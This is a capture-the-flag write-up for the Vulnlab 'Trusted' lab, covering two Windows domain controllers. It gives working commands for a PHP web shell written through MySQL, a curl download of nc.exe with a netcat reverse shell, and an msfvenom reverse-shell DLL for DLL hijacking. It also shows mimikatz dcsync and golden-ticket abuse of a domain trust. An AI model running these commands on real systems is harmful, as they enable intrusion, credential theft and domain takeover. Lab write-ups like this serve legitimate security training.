CTF-Writeups/Vulnlab/Trusted.md
2023-06-26 23:30:13 +05:00

13 KiB

Vulnlab - Trusted

10.10.212.5

NMAP

Nmap scan report for 10.10.212.5                                       
Host is up (0.097s latency).                       
Not shown: 65509 closed tcp ports (reset)          
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus                         
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-06-19 17:35:47Z)                    
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-06-19T17:37:17+00:00; +38s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-21T14:47:57
| Not valid after:  2023-10-21T14:47:57
| MD5:   45ea20be5e4bca32c9fc20b0d2c3801a
|_SHA-1: 46afd9e24c5f561f7de1089a8038b9f856db4b8a
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-06-19T17:37:01+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

10.10.212.6

NMAP

Nmap scan report for 10.10.212.6
Host is up (0.088s latency).                  
Not shown: 65508 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION  
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.212.6/dashboard/
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-methods:                
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-06-19 17:35:53Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn          
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-title: Welcome to XAMPP                            
|_Requested resource was https://10.10.212.6/dashboard/
| tls-alpn:                                
|_  http/1.1                                       
|_ssl-date: TLS randomness does not represent time 
| ssl-cert: Subject: commonName=localhost          
| Issuer: commonName=localhost                     
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a44cc99e84b26f9e639f9ed229dee0
|_SHA-1: b0238c547a905bfa119c4e8baccaeacf36491ff6
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3306/tcp  open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|_  Auth Plugin Name: mysql_native_password
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-06-19T17:37:17+00:00; +39s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-06-19T17:37:03+00:00
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Issuer: commonName=labdc.lab.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-04-21T14:48:14
| Not valid after:  2023-10-21T14:48:14
| MD5:   6b0e83e111daedeaeec7494630f036f6
|_SHA-1: 3b251ec4daa9f35d915589b7f6bb59fc071707c8
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0

PORT 445 (SMB)

Performing null authentication on SMB didn't showed any shares as well

PORT 389 (LDAP)

On ldap, performing null authentication didn't worked as well

PORT 80/443 (HTTP/HTTPS)

The webserver had XAMPP running

Fuzzing for files with gobuster it showed /dev

On visiting any of the pages, it's going to take the html page name as a GET parameter view

So here we can try Local File Inclusion (LFI) to see if any of the local files get included

http://10.10.212.6/dev/index.html?view=C:/WINDOWS/System32/drivers/etc/hosts

We can check the source of index.html file by using php://filter to encode the file contents in base64 as it might have php code which gets executed if it's in plain text

At the bottom we can see why we were able to include local files, as it's using include on GET parameter and accepting files. secondly we see a comment for Eric which talks about setting up database connection, on trying to fuzz for php files, we get db.php

From here we can get credentials to mysql

With these credentials we can login to mysql

With news database, we can query for users table

Here we can find three usernames, out of which rsmith's hash was cracked

On trying to crack these hashes with Crackstation

We can check if these credentials works on the target machine with crackmapexec

Checking the shares, there's wasn't any interesting share

Un-Intended (SYSTEM)

Going back to mysql, since we are root user, we may have file and write privilege, we can create a php file to execute system commands through GET parameter

select "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/xampp/htdocs/dev/shell.php';

Transferring nc.exe by setting up a python server to host the file

curl http://10.8.0.136/nc64.exe -o C:/Windows/Temp/nc.exe

Now executing it while having our netcat listener ready

C:/Windows/Temp/nc.exe 10.8.0.136 2222 -e cmd.exe

Intended (ewalters)

I wasn't able to run python-bloodhound, not sure what was the issue, since we have SYSTEM user on LABDC, I decided to enumerate lab.trusted.vl domain with sharphound.exe by downloading it through our python server

We can then download this through evil-winrm, since we have the administrator hash from the dump

Running bloodhound on the json files we got from sharphound, we can see a path from rsmith to ewalters by having ForceChangePassword ACL on ewalters, we can change the password and login by either WinRM or RDP since it has CanPSRemote permissions on the host

Through rpcclient, ewalters's password can be changed

setuserinfo2 ewalters 23 'Ewwalter@123456'

With cme we can verify if the password is actually updated and we can login through WinRM

In C:/ drive, there was a folder AVTest which had readme.txt talking about Christine to run AV tools

Using smbserver.py to transfer KasperskyRemovalTool.exe

Privilege Escalation (cpowers)

Transferring the exe on windows machine and running Process Monitor/Procmon to analyze which DLL is being loaded by this exe, on launching procmon, it's going to capture all system events

Running KasperskyRemovalTool.exe to make sure it's events gets logged

Hit ctrl+E to stop capturing for system events and apply filters to only display kaspersky process

First applying the filter for KasperskyRemovalTool process name

Next adding the filter for the dll files

Lastly for dlls which are not found, Here we'll see KasperskyRemovalToolENU.dll being loaded, so we need to create 32 bit DLL since the exe is in PE32 format

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.0.136 LPORT=2222 -f dll > KasperskyRemovalToolENU.dll

Transferring the dll file and putting it in C:/AVTest as the dll was being loaded from the same location from where the exe was being executed

Now wait for few seconds for the exe to be triggered which will execute our malicious dll and we'll get a shell as cpowers

This user was a member of domain admin , so we have complete access on the first machine

Privilege Escalation (Enterprise Admin)

We can enumerate the trust between labdc.trusted.vl and trusted.vl

([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()

nltest.exe /trusted_domains

Following this article, we can abuse this child->parent domain trust relationship and escalate to enterprise domain, in order to do this we need the krbtgt hash of lab.trusted.vl and the SIDs of both domains, then with mimikatz we can forge a golden ticket for the enterprise domain admin

lsadump::dcsync /domain:lab.trusted.vl /all

Dumping ntds.dit to get the krbtgt hash by using mimikatz

Getting the domain SID of lab.trusted.vl and trusted.vl by running lsadump::trust /patch

Now forging a ticket for enterprise domain admin

kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt

All that is left is to dump ntds from trusted.vl domain

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Having the administrator's hash from trusted.vl, we can login through WinRM and complete this AD chain.

Even tho we are administrator on the machine, the flag wasn't still readable as it was giving access denied

Here I had to login as the administrator by changing his password and then grabbing the flag

References